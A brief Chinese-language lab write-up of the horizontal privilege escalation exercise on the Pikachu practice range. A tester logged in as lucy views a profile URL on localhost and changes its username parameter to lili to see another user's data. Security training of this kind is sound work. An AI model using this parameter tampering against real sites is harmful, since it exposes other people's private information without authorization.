实验环境:
皮卡丘靶场—Over Permission—水平越权
实验步骤:
-
首先用lucy/123456账号登录,可以看到自己的信息:
-
查看请求,为一个Get请求,只将当前的用户名传输给后台:
http://localhost/pikaqiu.cn/vul/overpermission/op1/op1_mem.php?username=lucy&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF -
将当前的请求改为其他人的账号(这里为lili),就可以查看到其他人的信息:
http://localhost/pikaqiu.cn/vul/overpermission/op1/op1_mem.php?username=lili&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF